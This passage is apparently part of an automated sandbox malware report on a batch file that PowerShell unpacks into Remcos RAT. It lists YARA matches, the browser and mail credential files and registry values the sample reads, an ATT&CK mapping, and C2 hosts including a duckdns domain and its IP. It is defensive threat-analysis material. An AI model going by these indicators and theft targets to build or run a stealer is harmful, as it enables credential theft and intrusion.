              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,7_2_0041881C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,8_2_004082CD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0041739B GetVersionExW,7_2_0041739B

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.3145606062.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2656381876.0000000007361000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2515947583.0000000009427000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.2953604842.0000000002E5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2705660969.0000000008D17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2116165246.0000000008B77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2296515608.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2273047650.0000000007280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2110059731.000000000863D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2454927477.0000000007B30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1780515876.0000000008670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.4187297645.00000000080A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003A.00000002.3443687584.0000000008D07000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2100059153.0000000007190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2489969413.00000000089F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2671409010.000000000741E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1784027157.0000000008C97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.3856215786.0000000008704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1954330388.0000000008DB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000035.00000002.2648336815.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2287089513.00000000081C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: ESMTPPassword8_2_004033F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword8_2_00402DB3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword8_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IVJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.3145606062.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2656381876.0000000007361000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2515947583.0000000009427000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.2953604842.0000000002E5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2705660969.0000000008D17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2116165246.0000000008B77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2296515608.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2273047650.0000000007280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2110059731.000000000863D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2454927477.0000000007B30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1780515876.0000000008670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.4187297645.00000000080A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003A.00000002.3443687584.0000000008D07000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2100059153.0000000007190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2489969413.00000000089F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2671409010.000000000741E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1784027157.0000000008C97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.3856215786.0000000008704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1954330388.0000000008DB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000035.00000002.2648336815.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2287089513.00000000081C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts111
              Native API              		1
              Scripting              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services12
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts22
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		1
              Office Application Startup              		111
              Process Injection              		1
              Software Packing              		1
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares11
              Input Capture              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		NTDS16
              System Information Discovery              		Distributed Component Object Model2
              Clipboard Data              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets111
              Security Software Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
              Virtualization/Sandbox Evasion              		Cached Domain Credentials121
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture213
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612239 Sample: tOpxHK0Z2U.bat Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 72 abokirem.duckdns.org 2->72 74 geoplugin.net 2->74 76 0x0.st 2->76 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Malicious sample detected (through community Yara rule) 2->90 94 14 other signatures 2->94 9 cmd.exe 1 2->9         started        12 cmd.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 13 other processes 2->16 signatures3 92 Uses dynamic DNS services 72->92 process4 signatures5 104 Suspicious powershell command line found 9->104 106 Bypasses PowerShell execution policy 9->106 18 cmd.exe 3 9->18         started        21 conhost.exe 9->21         started        23 cmd.exe 2 12->23         started        25 conhost.exe 12->25         started        27 cmd.exe 2 14->27         started        29 conhost.exe 14->29         started        31 cmd.exe 2 16->31         started        33 cmd.exe 2 16->33         started        35 24 other processes 16->35 process6 signatures7 84 Suspicious powershell command line found 18->84 37 powershell.exe 19 34 18->37         started        42 conhost.exe 18->42         started        44 powershell.exe 23->44         started        46 conhost.exe 23->46         started        48 powershell.exe 27->48         started        50 conhost.exe 27->50         started        52 2 other processes 31->52 54 2 other processes 33->54 56 21 other processes 35->56 process8 dnsIp9 78 abokirem.duckdns.org 37.120.208.40, 49763, 49788, 56379 M247GB Romania 37->78 80 0x0.st 168.119.145.117, 443, 49749, 49857 HETZNER-ASDE Germany 37->80 82 geoplugin.net 178.237.33.50, 49794, 80 ATOM86-ASATOM86NL Netherlands 37->82 66 C:\Users\user\...\StartupScript_8b2957c5.cmd, ASCII 37->66 dropped 68 C:\ProgramData\remcos\logs.dat, data 37->68 dropped 96 Detected Remcos RAT 37->96 98 Tries to steal Mail credentials (via file registry) 37->98 100 Maps a DLL or memory area into another process 37->100 102 2 other signatures 37->102 58 powershell.exe 14 37->58         started        62 powershell.exe 1 37->62         started        64 powershell.exe 1 37->64         started        file10 signatures11 process12 file13 70 C:\Users\user\AppData\Local\Temp\eguw, Unicode 58->70 dropped 108 Tries to harvest and steal browser information (history, passwords, etc) 58->108 signatures14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.